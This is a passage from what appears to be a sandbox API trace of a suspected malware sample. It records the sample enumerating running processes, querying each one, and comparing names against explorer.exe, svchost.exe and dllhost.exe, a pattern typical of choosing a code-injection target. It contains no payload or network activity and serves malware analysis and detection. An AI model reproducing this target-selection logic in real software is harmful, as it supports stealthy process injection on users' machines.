[0219.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0219.440] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0219.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0219.440] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0219.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0219.441] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.441] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.441] CloseHandle (hObject=0xec) returned 1 [0219.441] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0219.441] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0219.441] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0219.441] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0219.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0219.442] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.442] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.442] CloseHandle (hObject=0xec) returned 1 [0219.442] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0219.442] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0219.442] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0219.442] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0219.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0219.442] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.442] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.442] CloseHandle (hObject=0xec) returned 1 [0219.443] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0219.443] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0219.443] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0219.443] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0219.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0219.443] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.443] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.443] CloseHandle (hObject=0xec) returned 1 [0219.443] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0219.443] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0219.443] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0219.443] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0219.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0219.444] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.444] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.444] CloseHandle (hObject=0xec) returned 1 [0219.444] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0219.444] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0219.444] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0219.444] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0219.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0219.444] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.445] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.445] CloseHandle (hObject=0xec) returned 1 [0219.445] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0219.445] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0219.445] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0219.445] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0219.445] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0219.445] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.445] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.445] CloseHandle (hObject=0xec) returned 1 [0219.445] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0219.445] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0219.445] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0219.445] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0219.446] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0219.446] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.446] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.446] CloseHandle (hObject=0xec) returned 1 [0219.446] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0219.446] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0219.446] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0219.446] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0219.446] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0219.447] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.447] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.447] CloseHandle (hObject=0xec) returned 1 [0219.447] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0219.447] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0219.447] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0219.447] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0219.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0219.447] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.447] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.447] CloseHandle (hObject=0xec) returned 1 [0219.447] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0219.447] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0219.447] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0219.447] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0219.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0219.448] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.448] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.448] CloseHandle (hObject=0xec) returned 1 [0219.448] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0219.448] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0219.448] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0219.448] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0219.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0219.449] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.449] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.449] CloseHandle (hObject=0xec) returned 1 [0219.449] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0219.449] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0219.449] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0219.449] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0219.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0219.449] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.449] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.449] CloseHandle (hObject=0xec) returned 1 [0219.449] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0219.449] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0219.449] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0219.449] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0219.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0219.450] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.450] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.450] CloseHandle (hObject=0xec) returned 1 [0219.450] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0219.450] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0219.450] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0219.450] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0219.451] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0219.451] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.451] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.451] CloseHandle (hObject=0xec) returned 1 [0219.451] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0219.451] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0219.451] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0219.451] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0219.451] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0219.451] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.451] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.451] CloseHandle (hObject=0xec) returned 1 [0219.451] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0219.451] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0219.451] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0219.451] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0219.452] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0219.452] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.452] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.452] CloseHandle (hObject=0xec) returned 1 [0219.452] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0219.452] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0219.452] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0219.452] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0219.453] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0219.453] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.453] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.453] CloseHandle (hObject=0xec) returned 1 [0219.453] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0219.453] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0219.453] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0219.453] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0219.453] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0219.453] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.453] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.453] CloseHandle (hObject=0xec) returned 1 [0219.453] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0219.453] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0219.453] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0219.454] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0219.454] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0219.454] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.454] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.455] CloseHandle (hObject=0xec) returned 1 [0219.455] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0219.455] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0219.455] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0219.455] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0219.455] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0219.455] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.455] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.455] CloseHandle (hObject=0xec) returned 1 [0219.455] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0219.455] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0219.455] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0219.455] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0219.456] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0219.456] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.456] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0219.456] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0219.457] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0219.457] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.457] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0219.457] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0219.458] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0219.458] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0219.458] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0219.458] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.458] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.458] CloseHandle (hObject=0xec) returned 1 [0219.458] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0219.459] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0219.459] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.459] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.459] CloseHandle (hObject=0xec) returned 1 [0219.459] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0219.460] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0219.460] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0219.460] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0219.460] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.460] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.460] CloseHandle (hObject=0xec) returned 1 [0219.460] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0219.460] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0219.461] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0219.461] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.461] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.461] CloseHandle (hObject=0xec) returned 1 [0219.461] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0219.461] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0219.462] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0219.462] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.462] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.462] CloseHandle (hObject=0xec) returned 1 [0219.462] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, 